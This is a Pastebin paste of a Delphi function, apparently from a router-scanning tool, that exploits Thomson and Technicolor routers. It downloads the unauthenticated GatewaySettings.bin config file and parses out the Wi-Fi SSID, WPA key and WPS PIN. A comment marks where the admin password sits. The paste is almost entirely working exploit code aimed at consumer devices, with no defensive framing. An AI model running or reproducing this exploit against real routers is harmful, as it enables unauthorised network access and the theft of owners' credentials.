API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 16th, 2016
64
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.79 KB | None | 0 0
raw download clone embed print report
  1. // References:
  2. // http://www.securiteam.com/securitynews/5XP380ADFA.html
  3.  
  4. function TRouter.Exploit_Thomson_Technicolor(UseAuth: Boolean; var AuthUser, AuthPass: String): Boolean;
  5. var
  6. Code: Integer;
  7. MS: TMemoryStream;
  8. dw, off: DWord;
  9. w: Word;
  10. Found: Boolean;
  11.  
  12. function SearchBlock(Src: TMemoryStream; Name: AnsiString; var Off: DWord;
  13. var Sz: Word): Boolean;
  14. var
  15. A: Array[0..3] of AnsiChar;
  16. begin
  17. Result := False;
  18. while Src.Position < Src.Size do begin
  19. Off := Src.Position;
  20. Src.ReadBuffer(w, 2);
  21. Sz := SwapEndian(w);
  22. Src.ReadBuffer(A[0], 4);
  23. Src.Seek(-6, soCurrent);
  24. if A = Name then begin
  25. Result := True;
  26. Exit;
  27. end;
  28. Src.Seek(Sz, soCurrent);
  29. end;
  30. end;
  31. begin
  32. // Affected:
  33. // Technicolor (many)
  34. // Thomson (many)
  35. Result := False;
  36. if ServerName <> '' then
  37. Exit;
  38. if AuthOk and (AuthUser = 'admin') then
  39. Exit;
  40. MS := TMemoryStream.Create;
  41. if GetHTTPStream('http://'+IPToStr(IP)+':'+IntToStr(Port)+'/GatewaySettings.bin',
  42. MS, Code, 5, 0, ServerName, False, AuthUser, AuthPass) then
  43. if MS.Size > 256 then begin
  44. MS.Seek($5A, soFromBeginning);
  45. MS.ReadBuffer(dw, 4);
  46. dw := SwapEndian(dw);
  47. if dw = $10000 then begin
  48. MS.Seek($5E, soFromBeginning);
  49. MS.ReadBuffer(w, 2);
  50. w := SwapEndian(w);
  51. if w = MS.Size - $10 then begin
  52. Found := SearchBlock(MS, '8021', off, w);
  53. if Found and (w >= $22E) then begin
  54. SSID := PAnsiChar(Cardinal(MS.Memory) + off + 8);
  55. SetTableCell(stcSSID, SSID);
  56. Pasw := PAnsiChar(Cardinal(MS.Memory) + off + $174);
  57. SetTableCell(stcKey, Pasw);
  58. Pin := PAnsiChar(Cardinal(MS.Memory) + off + $225);
  59. SetTableCell(stcPin, Pin);
  60. end;
  61. {Found := SearchBlock(MS, 'WiGu', off, w);
  62. if Found and (w >= $C1) then begin
  63. LAN := IntToStr(PByte(Cardinal(MS.Memory) + off + $B9)^)+
  64. '.' + IntToStr(PByte(Cardinal(MS.Memory) + off + $BA)^)+
  65. '.' + IntToStr(PByte(Cardinal(MS.Memory) + off + $BB)^)+
  66. '.' + IntToStr(PByte(Cardinal(MS.Memory) + off + $BC)^);
  67. SetTableCell(stcLANIP, LAN);
  68. LAN := IntToStr(PByte(Cardinal(MS.Memory) + off + $BD)^)+
  69. '.' + IntToStr(PByte(Cardinal(MS.Memory) + off + $BE)^)+
  70. '.' + IntToStr(PByte(Cardinal(MS.Memory) + off + $BF)^)+
  71. '.' + IntToStr(PByte(Cardinal(MS.Memory) + off + $C0)^);
  72. SetTableCell(stcLANMask, LAN);
  73. end;}
  74. Found := SearchBlock(MS, 'UPC.', off, w);
  75. if Found and (w >= $C1) then begin
  76. // admin password somewhere here
  77. end;
  78. end;
  79. end;
  80. end;
  81. MS.Free;
  82. end;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!